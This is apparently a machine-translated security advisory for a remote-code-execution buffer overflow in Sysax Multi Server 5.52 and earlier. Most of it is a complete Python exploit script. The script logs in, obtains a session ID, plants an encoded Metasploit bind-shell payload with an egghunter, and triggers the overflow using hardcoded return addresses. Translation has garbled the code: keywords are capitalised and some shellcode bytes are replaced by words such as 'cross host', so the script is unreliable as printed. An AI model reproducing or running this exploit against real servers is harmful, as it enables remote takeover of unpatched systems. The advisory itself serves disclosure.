Sysax Multi Server Upload uploadfile_name1.htm Buffer Overflow Vulnerability

Release date:
Updated on:

Affected Systems:
Codeorigin Sysax Multi Server 5.52
Codeorigin Sysax Multi Server 5.50
Codeorigin Sysax Multi Server 5.25
Codeorigin Sysax Multi Server 4.3
Description:
--------------------------------------------------------------------------------
Bugtraq id: 51950

Sysax Multi Server is an SSH2 and FTP Server on Windows.

The Sysax Multi Server has a buffer overflow vulnerability. Attackers can exploit this vulnerability to execute arbitrary code.

<* Source: Craig Freyman

Link: http://www.pwnag3.com/2012/02/sysax-multi-server-552-file-rename.html
*>

Test method:
--------------------------------------------------------------------------------
Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Craig Freyman () provides the following test methods:

#! /Usr/bin/python
######################################## ######################################## ##########################
# Title: Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)
# Author: Craig Freyman (@ cd1zz)
# Tested on: XP SP3 32bit and Server 2003 SP2 32bit (No DEP)
# Software Versions Tested: 5.50 and 5.52
# Date Discovered: Febrary 1, 2012
# Vendor Contacted: Febrary 3, 2012
# Vendor Response: (none)
# A complete description of this exploit can be found here:
# Http://www.pwnag3.com/2012/02/sysax-multi-server-552-file-rename.html
######################################## ######################################## ##########################
Import socket, sys, time, re, base64
If len (sys. argv )! = 6:
Print "[+] Usage:./filename <Target
IP> <Port> <User> <Password> <XP
Or 2K3>"
Sys. exit (1)
Target = sys. argv [1]
Port = int (sys. argv [2])
User = sys. argv [3]
Password = sys. argv [4]
Opersys = sys. argv [5]
# Base64 encode the provided creds
Creds = base64.encodestring (user + "\ x0a" + password)
# Msfpayload windows/shell_bind_tcp LPORT = 4444 R | msfencode-e x86/alpha_mixed-B "\ x00 \ x2f \ x0a"
Shell = ("DNWPDNWP"
"\ X89 \ xe3 \ xda \ xc5 \ xd9 \ x73 \ xf4 \ x5a \ x4a \ x4a \ x4a \ x4a \ x4a \ x4a"
"\ X4a \ x4a \ x4a \ x4a \ x4a \ x43 \ x43 \ x43 \ x43 \ x43 \ x43 \ x43 \ x37 \ x52 \ x59"
"\ X6a \ x41 \ x58 \ x50 \ x30 \ x41 \ x30 \ x41 \ x6b \ x41 \ x41 \ x51 \ x32 \ x41"
"\ X42 \ x32 \ x42 \ x42 \ x30 \ x42 \ x42 \ x41 \ x42 \ x58 \ x50 \ x38 \ x41 \ x42"
"\ X75 \ x4a \ x49 \ x39 \ x6c \ x58 \ x68 \ x6d \ x59 \ x55 \ x50 \ x65 \ x50 \ x45"
"\ X50 \ x55 \ x30 \ x4e \ x69 \ x39 \ x75 \ x55 \ x61 \ x39 \ x42 \ x61 \ x74 \ x4c"
"\ X4b \ x51 \ x42 \ x50 \ x30 \ x6e \ x6b \ x73 \ x62 \ x36 \ x6c \ x6e \ x6b \ x63"
"\ X62 \ x57 \ x64 \ x6c \ x4b \ x53 \ x42 \ x55 \ x78 \ x66 \ x6f \ x6d \ x67 \ x73"
"\ X7a \ x37 \ x56 \ x45 \ x61 \ x4b \ x4f \ x45 \ x61 \ x6f \ x30 \ x4c \ x6c \ x65"
"\ X6c \ x61 \ x71 \ x33 \ x4c \ x75 \ x52 \ x64 \ x6c \ x45 \ cross 7 \ x79 \ x51 \ x38"
"\ X4f \ x66 \ x6d \ x63 \ x31 \ x58 \ x47 \ x7a \ x42 \ x68 \ x73 \ x62 \ x71"
"\ X47 \ x6c \ x4b \ x33 \ x62 \ x32 \ x30 \ x4c \ x4b \ x77 \ x32 \ x55 \ x6c \ x36"
"\ X61 \ x58 \ x50 \ x6e \ x6b \ x71 \ x50 \ x62 \ x58 \ x6e \ x65 \ x4b \ cross 7 \ x33"
"\ X44 \ x61 \ x5a \ x77 \ x71 \ x68 \ x50 \ x72 \ cross V \ x4c \ x4b \ x33 \ x78 \ x36"
"\ X78 \ x6e \ x6b \ x58 \ x71 \ x30 \ x57 \ x71 \ x59 \ x43 \ x79 \ x73 \ x75"
"\ X6c \ x43 \ x79 \ x6e \ x6b \ x34 \ x74 \ x6c \ x4b \ x47 \ x71 \ x6e \ x36 \ x55"
"\ X61 \ x49 \ x6f \ x56 \ x51 \ x6f \ x30 \ x4c \ x6c \ x49 \ x51 \ x68 \ x4f \ x34"
"\ X4d \ x33 \ x31 \ x49 \ x57 \ x64 \ x78 \ x69 \ cross 7 \ x30 \ x75 \ x38 \ x74 \ x75"
"\ X53 \ x53 \ x4d \ x6b \ x48 \ x37 \ x4b \ x71 \ x6d \ x51 \ x34 \ x52 \ x55 \ x6a"
"\ X42 \ x33 \ x68 \ x4e \ x6b \ x42 \ x78 \ x75 \ x74 \ x43 \ x31 \ x6e \ x33 \ x62"
"\ X46 \ x6e \ x6b \ x66 \ x6c \ x32 \ x6b \ x4e \ x6b \ x76 \ x38 \ x47 \ x6c \ x77"
"\ X71 \ x68 \ x53 \ x4e \ x6b \ x65 \ x54 \ x4c \ x4b \ x57 \ x71 \ x78 \ x50 \ x4f"
"\ X79 \ x67 \ x34 \ x51 \ x34 \ x51 \ x34 \ x63 \ x6b \ x61 \ x4b \ x65 \ x31 \ x30"
"\ X59 \ x30 \ x5a \ x53 \ x61 \ x39 \ x6f \ x6d \ x30 \ x33 \ x68 \ x31 \ x4f \ x52"
"\ X7a \ x6c \ x4b \ x65 \ x42 \ x68 \ x6b \ x4c \ x46 \ x63 \ x6d \ x55 \ x38 \ x44"
"\ X73 \ x46 \ x52 \ x63 \ x30 \ x33 \ x30 \ x35 \ x38 \ x42 \ x57 \ x30 \ x73 \ x50"
"\ X32 \ x73 \ x6f \ x50 \ x54 \ x31 \ x78 \ x52 \ x6c \ x34 \ x37 \ x44 \ x66 \ x44"
"\ X47 \ x59 \ x6f \ x6e \ x35 \ x6e \ x58 \ x6e \ x77 \ x71 \ x55 \ x50 \ x55"
"\ X50 \ x46 \ x49 \ x49 \ x54 \ x46 \ x34 \ x42 \ x61 \ x78 \ x51 \ x39 \ x6f"
"\ Cross host \ x50 \ x6b \ x53 \ x30 \ x59 \ x6f \ x49 \ x45 \ x50 \ x50 \ x50 \ x50 \ x36"
"\ X30 \ x72 \ cross \ x51 \ x50 \ x32 \ cross 57 \ x30 \ x72 \ cross 7 \ x43 \ x58 \ x38"
"\ X6a \ x34 \ x4f \ x79 \ x4f \ x6b \ x50 \ x79 \ x6f \ x39 \ x45 \ x6d \ x59 \ x79"
"\ X57 \ x50 \ x31 \ x49 \ x4b \ x51 \ x43 \ x65 \ x38 \ x43 \ x32 \ x45 \ x50 \ x72"
"\ X31 \ x73 \ x6c \ x6c \ x49 \ x49 \ x76 \ x32 \ x4a \ x34 \ x50 \ x76 \ x36 \ x72"
"\ X77 \ x45 \ x38 \ x5a \ x62 \ x4b \ x6b \ x55 \ x67 \ x63 \ x57 \ x79 \ x6f \ x38"
"\ X55 \ x71 \ x43 \ x51 \ x47 \ x43 \ x58 \ x4f \ x47 \ x59 \ x79 \ x64 \ x78 \ x69"
"\ X6f \ x59 \ x6f \ x7a \ x75 \ x36 \ x33 \ x53 \ x51 \ x47 \ x65 \ x38 \ x61"
"\ X64 \ x78 \ x6c \ x67 \ x4b \ x69 \ x71 \ x49 \ x6f \ x48 \ x55 \ cross 7 \ x57 \ x6f"
"\ X79 \ x49 \ x57 \ x63 \ x58 \ x42 \ x55 \ x50 \ x6e \ x72 \ x6d \ x55 \ x31 \ x79"
"\ X6f \ x39 \ x45 \ x33 \ x58 \ x63 \ x53 \ x72 \ x4d \ x35 \ x34 \ x77 \ cross 7 \ x4e"
"\ X69 \ x79 \ x73 \ x76 \ x37 \ x73 \ x67 \ x62 \ x77 \ x46 \ x51 \ x7a \ x56 \ x31"
"\ X7a \ x57 \ x62 \ x76 \ x39 \ x46 \ x36 \ x4b \ x52 \ x39 \ x6d \ x42 \ x46 \ x38"
"\ X47 \ x62 \ x64 \ x61 \ x34 \ x47 \ x4c \ x45 \ x51 \ x57 \ x71 \ x4c \ x4d \ x47"
"\ X34 \ x76 \ x44 \ x44 \ x50 \ x79 \ x56 \ x63 \ x30 \ x53 \ x74 \ x33 \ x64 \ cross city"
"\ X50 \ x53 \ x66 \ x42 \ x76 \ x52 \ x76 \ x53 \ x76 \ x76 \ x36 \ x30 \ x4e \ x71"
"\ X46 \ x32 \ x76 \ x36 \ x33 \ x62 \ x76 \ x53 \ x58 \ x44 \ x39 \ x48 \ x4c \ x57"
"\ X4f \ x6e \ x66 \ x69 \ x6f \ x79 \ x45 \ x6f \ x79 \ x6d \ x30 \ x30 \ x4e \ x32"
"\ X76 \ x63 \ x76 \ x49 \ x6f \ x56 \ x50 \ x42 \ x48 \ x65 \ x58 \ x6d \ x57 \ x45"
"\ X4d \ x31 \ cross client \ x79 \ x6f \ x38 \ x55 \ x4d \ x6b \ x78 \ cross client \ x4d \ x65 \ x69"
"\ X32 \ x30 \ x56 \ x50 \ x68 \ x4f \ x56 \ x4a \ x35 \ x4d \ x6d \ x6f \ x6d \ x49"
"\ X6f \ x39 \ x45 \ x55 \ x6c \ x66 \ x66 \ x43 \ x4c \ x56 \ x6a \ x4d \ x50 \ x69"
"\ X6b \ x59 \ cross-client \ x64 \ x35 \ x74 \ x45 \ x6f \ x4b \ x53 \ x77 \ x55 \ x43 \ x43"
"\ X42 \ x42 \ x4f \ x43 \ x5a \ x55 \ x50 \ x52 \ x73 \ x79 \ x6f \ x68 \ x55 \ x41"
"\ X41 ")
Egghunter = ("\ x66 \ x81 \ xca \ xff \ x0f \ x42 \ x52 \ x6a \ x02 \ x58 \ xcd \ x2e \ x3c \ x05 \ x5a \ x74 \ xef \ xb8 \ x44 \ x4e \ x57 \ x50 \ x8b \ xfa \ xaf \ x75 \ xea \ xaf \ x75 \ xe7 \ xff \ xe7 ")
Print "============================================ ============================================"
Print "Sysax Multi Server <= 5.52 File Rename BoF"
Print "by cd1zz"
Print "www.pwnag3.com"
Print "Launching exploit against" + target + "on port" + str (port) + "for" + opersys
Print "============================================ ============================================"
# Login with encoded creds
Login = "POST/scgi? Sid = 0 & pid = dologin HTTP/1.1 \ r \ n"
Login + = "Host: \ r \ n"
Login + = "User-Agent: Mozilla/5.0 (X11; Linux i686; rv: 9.0.1) Gecko/20100101 Firefox/9.0.1 \ r \ n"
Login + = "Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 \ r \ n"
Login + = "Accept-Language: en-us, en; q = 0.5 \ r \ n"
Login + = "Accept-Encoding: gzip, deflate \ r \ n"
Login + = "Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7 \ r \ n"
Login + = "Proxy-Connection: keep-alive \ r \ n"
Login + = "http: //" + target + "/scgi? Sid = 0 & pid = dologin \ r \ n"
Login + = "Content-Type: application/x-www-form-urlencoded \ r \ n"
Login + = "Content-Length: 15 \ r \ n"
Login + = "fd =" + creds
# Grab the sid
R = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
R. connect (target, port ))
Print "[*] Getting your SID ."
R. send (login + "\ r \ n ")
Page = r. recv (10240)
Sid = re. search (r'sid = [a-zA-Z0-9] {40} ', page, re. M)
If sid is None:
Print "[X] cocould not get a SID. User and pass correct? "
Sys. exit (1)
Print "[+] Your" + sid. group (0)
Time. sleep (2)
# Find the users path to calc offset
Print "[*] Finding home path to calculate offset ."
Path = re. search (r'file = [a-zA-Z0-9]: \ [\. a-zA-Z_0-9] {1,255} [\ $] ', page, re. M)
Time. sleep (1)
# If that doesnt work, try to upload a file and check again
If path is None:
Print "[-] There are no files in your path so I'm going to try to upload one for you ."
Print "[-] If you don't have rights to do this, it will fail ."
Upload = "POST/scgi? "+ Str (sid. group (0) +" &pid=uploadfile_name1.htm HTTP/1.1 \ r \ n"
Upload + = "Host: \ r \ n"
Upload + = "Content-Type: multipart/form-data; boundary = ------------------------- 97336096252362005297691620 \ r \ n"
Upload + = "Content-Length: 219 \ r \ n"
Upload + = "----------------------------- 97336096252362005297691620 \ r \ n"
Upload + = "Content-Disposition: form-data; name = \" upload_file \ "; filename = \" file.txt \ "\ r \ n"
Upload + = "Content-Type: text/plain \ r \ n"
Upload + = "----------------------------- 97336096252362005297691620 -- \ r \ n"
U = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
U. connect (target, port ))
U. send (upload + "\ r \ n ")
Page = u. recv (10240)
Path = re. search (r'file = [a-zA-Z0-9]: \ [\. a-zA-Z_0-9] {1,255} [\ $] ', page, re. M)
Time. sleep (2)
If path is None:
Print "[X] It failed, you probably don't have rights to upload ."
Print "[X] You will need to get your path another way to properly calculate the offset ."
Sys. exit (1)
Print "[+] Got it =>" + path. group (0)
Time. sleep (1)
# Subtract --> file = c :\< ---
(8 bytes) from the length and minus one more for the trailing --> \
Pathlength = len (path. group (0)-8-1
# Print "[*] The path is" + str (pathlength) + "bytes long (not including C :\)."
If pathlength <16:
Print "[X] Your path is too short, this will just DoS the server ."
Print "[X] The path has to be at least 16 bytes long or we cant jump to our buffer ."
Sys. exit (1)
Time. sleep (2)
R. close ()
# Jump back128 bytes
Jumpback = "\ xeb \ x80"
# No DEP bypass
If opersys = "2K3 ":
#2043 is the offset for c: \
Offset = 2044-pathlength
Padding = "\ x90" * 10
Junk = "\ x41" * (offset-len (egghunter + padding ))
Jump = "\ xa4 \ xde \ x8e \ x7c" # JMP ESP
Buf = junk + egghunter + padding + jump + "\ x90" * 12 + jumpback + "D" * 10
If opersys = "XP ":
#2044 is the offset for c: \
Offset = 2044-pathlength
Padding = "\ x90" * 10
Junk = "\ x41" * (offset-len (egghunter + padding ))
Jump = "\ x53 \ x93 \ x42 \ x7e" # JMP ESP
Buf = junk + egghunter + padding + jump + "\ x90" * 12 + jumpback + "D" * 10
# Print "[*] Your offset is" + str (offset)
# We'll stuff our shell in memory first
Stage1 = "POST/scgi? "+ Str (sid. group (0) +" & pid = "+ shell +" mk_folder2_name1.htm HTTP/1.1 \ r \ n"
Stage1 + = "Host: \ r \ n"
Stage1 + = "Referer: http: //" + target + "/scgi? Sid = "+ str (sid. group (0) +" &pid=mk_folder=name1.htm \ r \ n"
Stage1 + = "Content-Type: multipart/form-data; boundary = ------------------------- 1190753071675116720811342231 \ r \ n"
Stage1 + = "Content-Length: 171 \ r \ n"
Stage1 + = "----------------------------- 1190753071675116720811342231 \ r \ n"
Stage1 + = "Content-Disposition: form-data; name = \" e2 \ "\ r \ n"
Stage1 + = "file_test \ r \ n"
Stage1 + = "----------------------------- 1190753071675116720811342231 -- \ r \ n"
# This is the bof
Stage2 = "POST/scgi? "+ Str (sid. group (0) +" &pid=rnmslctd=name1.htm HTTP/1.1 \ r \ n"
Stage2 + = "Host: \ r \ n"
Stage2 + = "Referrer: http: //" + target + "/scgi? Sid = 0 & pid = dologin \ r \ n"
Stage2 + = "Content-Type: multipart/form-data; boundary = ------------------------- 332173112583677792048824791 \ r \ n"
Stage2 + = "Content-Length: 183 \ r \ n"
Stage2 + = "----------------------------- 332173112583677792048824791 \ r \ n"
Stage2 + = "Content-Disposition: form-data; name = \" e2 \ "\ r \ n"
Stage2 + = "file _" + buf + "\ r \ n"
Stage2 + = "----------------------------- 332173112583677792048824791 -- \ r \ n"
S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
S. connect (target, port ))
Print "[*] Sending stage 1 shell ."
S. send (stage1 + "\ r \ n ")
Time. sleep (3)
# Dont close the socket or we'll lose our stage 1 shell in memory
# S. close ()
T = socket. socket (socket. AF_INET, socket. SOCK_STREAM)
T. connect (target, port ))
Print "[*] Sending stage 2 BoF ."
T. send (stage2 + "\ r \ n ")
Print "[*] Go get your shell ..."
T. recv (2048)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Codeorigin
----------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.ftpshell.com/index.htm